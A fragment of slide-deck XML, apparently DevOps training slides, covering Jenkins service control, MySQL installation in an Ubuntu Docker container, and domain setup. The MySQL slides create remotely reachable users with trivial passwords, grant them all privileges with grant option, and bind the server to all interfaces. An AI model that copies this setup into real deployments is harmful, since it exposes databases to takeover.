                </a:solidFill>
              </a:rPr>
              <a:t>systemctl status jenkins</a:t>
            </a:r>
            <a:endParaRPr sz="3750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1841" name="Google Shape;1841;p298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Start/Stop/Restart Jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1846" name="Google Shape;1846;p299"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="22163" l="3234" r="43830" t="13836"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="941200" y="144200"/>
            <a:ext cx="7139002" cy="4855100"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1851" name="Google Shape;1851;p300"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25579" l="0" r="40835" t="13604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008275" y="377750"/>
            <a:ext cx="7714752" cy="4460551"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1856" name="Google Shape;1856;p301"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="44616" l="3219" r="46632" t="12159"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="834500" y="649625"/>
            <a:ext cx="7928674" cy="3844249"/>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302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -it -d --name -p 3306:3306 uc1 ubuntu:latest</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docker container exec -it /bin/bash</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apt update</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apt list --upgradable</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apt upgrade -y</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apt install mysql-server -y</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service mysql start</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service mysql status</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mysql</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CREATE USER 'anil'@'localhost' IDENTIFIED BY 'anil@123';</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CREATE USER 'abhishek'@'%' IDENTIFIED BY 'abhishek@123';</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If we want to give all permission then</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ALL PRIVILEGES</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GRANT ALL PRIVILEGES ON *.* TO 'anil'@'localhost' WITH GRANT OPTION;</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GRANT ALL PRIVILEGES ON *.* TO 'abhishek'@'%' WITH GRANT OPTION;</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FLUSH PRIVILEGES;</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service mysql restart</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docker run -it -d -p 3306:3306 --name uc3 uc2</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Allow MySQL Server to accept remote request</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apt install plocate -y</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plocate my.cnf</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plocate my.ini</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plocate mysqld.cnf</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/etc/mysql/my.cnf</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apt install vim -y</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vim /etc/mysql/mysql.conf.d/mysqld.cnf</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[mysqld]</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bind-address = 0.0.0.0</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000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service mysql restart</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1862" name="Google Shape;1862;p302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Install MySQL Database in Docker Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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303"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL PRIVILEGES</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GRANT ALL PRIVILEGES ON *.* TO 'anil'@'localhost' WITH GRANT OPTION;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GRANT ALL PRIVILEGES ON *.* TO 'abhishek'@'%' WITH GRANT OPTION;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FLUSH PRIVILEGES;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service mysql restart</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -it -d -p 3306:3306 --name uc3 uc2</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allow MySQL Server to accept remote request</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apt install plocate -y</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plocate my.cnf</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plocate my.ini</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plocate mysqld.cnf</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/mysql/my.cnf</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apt install vim -y</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1868" name="Google Shape;1868;p303"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Install MySQL Database in Docker Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">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52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="7783" t="8850"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="509273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304"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vim /etc/mysql/mysql.conf.d/mysqld.cnf</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[mysqld]</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bind-address = 0.0.0.0</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service mysql restart</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oklabs/mysql8_image1</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -it -d -p 4406:3306 --name mysqlcont2 oklabs/mysql8_image1</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1874" name="Google Shape;1874;p304"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695750" y="121650"/>
            <a:ext cx="7790100" cy="7044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400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Install MySQL Database in Docker Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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p305"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583750" y="890075"/>
            <a:ext cx="7603200" cy="41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700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prerequisite</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must have a live server</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-336550" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must have a domain or subdomain</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://frontend.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> →  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>38.242.236.173:8080</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go inside the domain panel</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
